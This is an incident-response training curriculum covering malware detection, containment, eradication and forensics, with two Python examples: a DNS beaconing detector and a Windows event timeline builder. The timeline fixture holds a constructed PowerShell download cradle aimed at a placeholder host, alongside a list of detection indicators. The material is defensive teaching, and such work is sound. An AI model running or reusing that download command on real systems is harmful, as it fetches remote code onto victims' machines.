This curriculum spans the full incident lifecycle—from threat intelligence integration and detection engineering to forensic analysis and governance—mirroring the iterative, cross-functional workflows seen in enterprise incident response teams managing active malware outbreaks.
Module 1: Threat Landscape and Malware Taxonomy
- Selecting malware classification frameworks (e.g., MITRE ATT&CK, VERIS) based on organizational detection capabilities and incident reporting requirements.
- Mapping observed malware behaviors to known families (e.g., Emotet, QakBot) using YARA rules and IoC databases from trusted threat intelligence feeds.
- Deciding whether to analyze malware in-house or outsource to third-party labs based on resource constraints and data sensitivity.
- Integrating dynamic analysis outputs from sandbox environments (e.g., ANY.RUN, Cuckoo) into SIEM workflows for automated alert triage.
- Assessing the operational risk of detonating suspicious files in controlled environments with proper network isolation and monitoring.
- Updating internal threat models quarterly to reflect shifts in malware delivery vectors such as phishing, RDP brute force, or supply chain compromises.
Module 2: Detection Architecture and Sensor Placement
- Deploying EDR agents across hybrid environments while managing performance impact on legacy systems and virtual desktops.
- Configuring network-based detection sensors (e.g., Suricata, Zeek) at key ingress/egress points to capture lateral movement and C2 traffic.
- Calibrating detection thresholds for heuristic and behavioral alerts to reduce false positives without increasing dwell time.
- Implementing DNS sinkholing for known malicious domains and monitoring query patterns for beaconing behavior.
- Validating log source coverage across endpoints, firewalls, proxies, and cloud workloads to ensure detection visibility.
- Evaluating the trade-offs between signature-based detection and machine learning models in high-noise environments.
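As an added illustration of the beaconing check in this module (example code, not part of the curriculum), the script below scores how regular the spacing between DNS queries is for each client/domain pair in a constructed resolver log; near-constant intervals are the pattern a sinkhole or DNS sensor would raise for review. The log format, hosts and domains are all constructed.

```python
# Added example (not from the curriculum): flag DNS beaconing candidates from
# constructed resolver query logs by measuring how regular the query interval
# is for each (client, domain) pair. Regular spacing with little jitter is the
# tell; a low coefficient of variation (CV) of the gaps captures that.
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log lines, "timestamp client domain" per line (not real data).
# The first domain is queried every ~60 s; the second at irregular times.
LOG_LINES = """\
2024-05-01T10:00:00Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:01:00Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:02:01Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:02:59Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:04:00Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:05:00Z 10.0.5.23 update.example-cdn.invalid
2024-05-01T10:00:12Z 10.0.5.23 www.example.com
2024-05-01T10:00:14Z 10.0.5.23 www.example.com
2024-05-01T10:03:40Z 10.0.5.23 www.example.com
2024-05-01T10:04:05Z 10.0.5.23 www.example.com
2024-05-01T10:09:30Z 10.0.5.23 www.example.com
2024-05-01T10:11:00Z 10.0.5.23 www.example.com
"""

def parse(lines):
    """Group query timestamps by (client, domain)."""
    out = defaultdict(list)
    for line in lines.splitlines():
        ts, client, domain = line.split()
        out[(client, domain)].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    return out

def beacon_score(times):
    """Return (mean gap in seconds, CV of the gaps) for a list of query times."""
    t = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(t, t[1:])]
    if not gaps:
        return 0.0, float("inf")
    mean = statistics.mean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else float("inf")
    return mean, cv

def beacon_candidates(lines, min_queries=5, max_cv=0.1):
    """Pairs with at least min_queries queries and near-constant spacing.
    Tune max_cv upward if the implant adds jitter; tune min_queries to the
    window length so a handful of chance hits does not trigger."""
    hits = []
    for (client, domain), times in parse(lines).items():
        if len(times) < min_queries:
            continue
        mean, cv = beacon_score(times)
        if cv <= max_cv:
            hits.append((client, domain, round(mean, 1), round(cv, 3)))
    return hits
```

Real implants add jitter and sleep skew, so in production this score is one input to triage next to domain age, query volume and response codes, not a verdict by itself.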
Module 3: Incident Triage and Initial Validation
- Establishing criteria for escalating alerts based on IoC confidence, asset criticality, and user role (e.g., executive vs. contractor).
- Conducting memory and disk acquisition on suspected hosts using forensically sound tools (e.g., Velociraptor, KAPE) without disrupting operations.
- Correlating endpoint telemetry with proxy and authentication logs to confirm unauthorized access or data exfiltration.
- Deciding whether to immediately isolate a host or allow controlled observation to map attacker infrastructure.
- Documenting chain of custody for forensic artifacts when legal or regulatory investigations are anticipated.
- Initiating parallel analysis of user activity logs to rule out insider involvement or compromised credentials.
Module 4: Containment Strategies and Network Segmentation
- Implementing VLAN resegmentation or firewall rule changes to isolate infected subnets without disrupting business-critical applications.
- Disabling compromised user accounts and service principals while preserving login history for timeline reconstruction.
- Blocking malicious IPs and domains at the firewall and DNS layers using automated playbooks in SOAR platforms.
- Assessing the risk of disabling SMBv1 or other legacy protocols during containment versus maintaining system functionality.
- Coordinating with network operations to reroute traffic and maintain availability during containment actions.
- Using microsegmentation policies in cloud environments (e.g., AWS Security Groups, Azure NSGs) to restrict lateral movement.
Module 5: Eradication and System Remediation
- Determining whether to rebuild infected systems from gold images or perform in-place remediation based on malware persistence mechanisms.
- Validating removal of registry run keys, scheduled tasks, and WMI event subscriptions used by fileless malware.
- Rotating credentials for local admin, domain admin, and privileged service accounts following known compromise.
- Applying firmware and UEFI scanning tools to detect and remove rootkits in persistent system memory.
- Re-enabling systems only after confirming clean state via EDR telemetry and log review over a defined observation window.
- Updating antivirus signatures and EDR policies to detect previously observed TTPs across the enterprise.
Module 6: Post-Incident Forensics and Timeline Reconstruction
- Reconstructing attack timelines using Windows Event Logs (e.g., 4688, 4624, 4104) and PowerShell transcription logs.
- Extracting and analyzing prefetch, shimcache, and MFT entries to identify execution order and file modifications.
- Mapping lateral movement paths using Kerberos ticket requests, RDP connection logs, and SMB session data.
- Conducting memory dump analysis to uncover injected code, hidden processes, and decrypted payloads.
- Correlating external threat intelligence with internal findings to attribute activity to known threat actors.
- Producing technical reports for legal, compliance, or regulatory bodies with redacted evidence packages.
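To show the timeline step in this module concretely, here is an added example (not the curriculum's own code) that orders constructed 4624, 4688 and 4104 records, ties each process creation and script block back to the logon session through the LogonId, and pulls out the script blocks a reviewer would want to look at first. It assumes the records have already been flattened into dicts and that the 4104 entries were enriched with the session's LogonId; the hostnames, users, IDs and script text are all constructed.

```python
# Added example (not from the curriculum): reconstruct a host timeline from
# constructed Windows event records (4624 logon, 4688 process creation,
# 4104 PowerShell script block), linking events to the logon session that
# produced them through the LogonId shared by 4624 and 4688.
from datetime import datetime

# Constructed records in a flattened form like a SIEM export (not real
# telemetry). One event is deliberately out of order to exercise the sort.
EVENTS = [
    {"ts": "2024-05-01T09:02:10Z", "id": 4624, "user": "jdoe", "logon_id": "0x3E7A1",
     "logon_type": 10, "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T09:02:45Z", "id": 4688, "user": "jdoe", "logon_id": "0x3E7A1",
     "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe"},
    {"ts": "2024-05-01T09:03:02Z", "id": 4688, "user": "jdoe", "logon_id": "0x3E7A1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2024-05-01T09:03:05Z", "id": 4104, "user": "jdoe", "logon_id": "0x3E7A1",
     "script": "(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"},
    {"ts": "2024-05-01T08:59:59Z", "id": 4624, "user": "svc_backup", "logon_id": "0x1A2B3",
     "logon_type": 5, "src_ip": "-"},
]

# Script-block substrings worth a closer look; extend from your own detections.
SCRIPT_INDICATORS = ("DownloadString", "-EncodedCommand", "FromBase64String")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def build_timeline(events):
    """Sort by time and attach the originating 4624 (if captured) to every
    event with the same LogonId, so the RDP/network origin follows each
    process and script block."""
    sessions, timeline = {}, []
    for e in sorted(events, key=lambda e: parse_ts(e["ts"])):
        if e["id"] == 4624:
            sessions[e["logon_id"]] = e
        timeline.append({**e, "session": sessions.get(e.get("logon_id"))})
    return timeline

def process_chain(timeline, logon_id):
    """Process images started under one logon session, in execution order."""
    return [e["image"] for e in timeline
            if e["id"] == 4688 and e["logon_id"] == logon_id]

def flagged_script_blocks(timeline):
    """4104 events containing an indicator, with the logon type and source IP
    of the session they ran in (None when no 4624 was captured)."""
    hits = []
    for e in timeline:
        if e["id"] == 4104 and any(k in e["script"] for k in SCRIPT_INDICATORS):
            s = e["session"]
            hits.append((e["ts"], s["logon_type"] if s else None, s["src_ip"] if s else None))
    return hits
```

A missing session on a flagged block usually means the 4624 fell outside the collection window or came from another host, which is the cue to widen the pull rather than to discount the finding.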
Module 7: Governance, Reporting, and Continuous Improvement
- Defining incident severity levels and escalation paths aligned with business impact and regulatory requirements (e.g., GDPR, HIPAA).
- Conducting post-mortem reviews with IT, legal, and executive stakeholders to document root causes and accountability.
- Updating incident response playbooks based on gaps identified during recent malware engagements.
- Measuring detection-to-remediation time (MTTR) and refining SLAs for future response operations.
- Implementing automated phishing simulation and endpoint hardening metrics to validate preventive control efficacy.
- Integrating lessons learned into tabletop exercises and red team scenarios to test readiness improvements.